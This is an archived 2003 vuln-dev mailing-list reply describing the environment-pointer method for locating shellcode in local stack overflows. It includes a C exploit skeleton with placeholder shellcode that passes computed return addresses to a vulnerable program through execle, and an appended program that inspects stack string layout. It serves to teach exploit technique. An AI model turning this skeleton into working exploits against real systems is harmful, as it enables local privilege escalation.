Vulnerability Development mailing list archives

Re: Automatic discovery of shellcode address


From: Marco Ivaldi <raptor () 0xdeadbeef info>
Date: Tue, 25 Mar 2003 01:38:50 +0100 (CET)

On Mon, 24 Mar 2003 steve () uk intasys com wrote:

  That wasn't the part that I was considering as being novel.

  When I've coded things before I've spent most of my time determining
 where the return address lies within the area I've overflowed.  (By
 doing a binary search of my 'XXXXXX's).

  I was thinking that by knowing the address of the buffer in the
 process's memory space this would reduce the number of trials down
 to four.  (To deal with alignment issues).

If you are exploiting a local vulnerability you can also use the even
simpler env pointer technique to locate the shellcode.

#include <string.h>
#include <unistd.h>

/* Placeholders, not in the original post: the shellcode string, the size
 * of the overflowed buffer and the alignment offset are target-specific. */
char sc[] = "SHELLCODE-PLACEHOLDER";
#define BUF 512
#define ALIGN 0

int main()
{
        char *env[2] = {sc, NULL};
        char buf[BUF];
        int i;

        /* fill buf with the predicted shellcode address, 4 bytes at a time */
        int *ap = (int *)(buf + ALIGN);
        int ret = 0xbffffffa - strlen(sc) - strlen("./vuln-program");

        for (i = 0; i < BUF - 1; i += 4)
                *ap++ = ret;
        *ap = 0x0;

        /* the target gets the shellcode as its only environment string */
        execle("./vuln-program", "vuln-program", buf, NULL, env);
        return 0;
}

As you can see, for ./vuln-program the shellcode will always be at:

0xbffffffa - strlen(sc) - strlen("./vuln-program")

Cheers,

:raptor
Antifork Research, Inc.                 0xdeadbeef | raptor's labs
http://www.antifork.org                 http://www.0xdeadbeef.info
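Added illustration (my own code, not part of raptor's post or the thread): the formula above rests on the way execve() lays out strings at the top of the stack, with argv strings lowest, environment strings immediately above them in one contiguous block, and, on Linux, the executable path right after the last environment string under the zero padding at the stack top. The program below checks those layout properties for its own process and prints the addresses it sees, so you can confirm that an environment string's position is fixed only when the stack top itself is fixed; run it twice under `env -i SC=AAAA ./envlayout` and, on a kernel with stack randomization, the printed addresses change between runs, which is precisely what defeats the technique. The `constructed_layout_check` function uses a constructed two-string environment to exercise the checks without depending on the real process.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

extern char **environ;

/* Returns 1 when every environment string begins exactly one byte past
 * the terminator of the previous one, i.e. the strings form the single
 * contiguous block that execve() writes below the stack top. */
int env_strings_contiguous(char **envp)
{
    size_t i;

    if (envp == NULL || envp[0] == NULL)
        return 1;                       /* empty environment: nothing to check */
    for (i = 0; envp[i + 1] != NULL; i++)
        if (envp[i + 1] != envp[i] + strlen(envp[i]) + 1)
            return 0;
    return 1;
}

/* Returns 1 when the last argv string is immediately followed by the
 * first environment string, the other half of the contiguous layout. */
int argv_adjacent_to_env(int argc, char **argv, char **envp)
{
    if (argc < 1 || envp == NULL || envp[0] == NULL)
        return 0;
    return envp[0] == argv[argc - 1] + strlen(argv[argc - 1]) + 1;
}

/* Address one byte past the last environment string. On Linux this is
 * where the executable path (the "./vuln-program" term of the formula)
 * is stored, just below the zero padding at the stack top. Returns 0
 * for an empty environment. */
uintptr_t env_block_end(char **envp)
{
    size_t i = 0;

    if (envp == NULL || envp[0] == NULL)
        return 0;
    while (envp[i + 1] != NULL)
        i++;
    return (uintptr_t)(envp[i] + strlen(envp[i]) + 1);
}

/* Exercises the checks on a constructed environment block: "A=1" and
 * "B=2" packed back to back, once referenced correctly (contiguous) and
 * once with the second pointer off by one (not contiguous). Returns a
 * bitmask: bit 0 = good layout accepted, bit 1 = bad layout rejected,
 * bit 2 = block end computed correctly. All checks passing gives 7. */
int constructed_layout_check(void)
{
    char blk[] = "A=1\0B=2";            /* constructed sample, 8 bytes */
    char *good[] = { blk, blk + 4, NULL };
    char *bad[]  = { blk, blk + 5, NULL };
    int mask = 0;

    if (env_strings_contiguous(good) == 1)
        mask |= 1;
    if (env_strings_contiguous(bad) == 0)
        mask |= 2;
    if (env_block_end(good) == (uintptr_t)(blk + 8))
        mask |= 4;
    return mask;
}

int main(int argc, char **argv)
{
    uintptr_t end = env_block_end(environ);

    printf("argv strings start at   %p\n", (void *)argv[0]);
    printf("env strings start at    %p\n", environ[0] ? (void *)environ[0] : NULL);
    printf("env block ends at       0x%lx\n", (unsigned long)end);
    printf("string after env block  %s\n", end ? (char *)end : "(no environment)");
    printf("argv/env adjacent: %s, env strings contiguous: %s\n",
           argv_adjacent_to_env(argc, argv, environ) ? "yes" : "no",
           env_strings_contiguous(environ) ? "yes" : "no");
    return 0;
}
```

Compile with `cc -o envlayout envlayout.c`. The "string after env block" line is the execfn only on Linux; on other kernels the byte past the environment may hold something else, so treat that line as informational.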
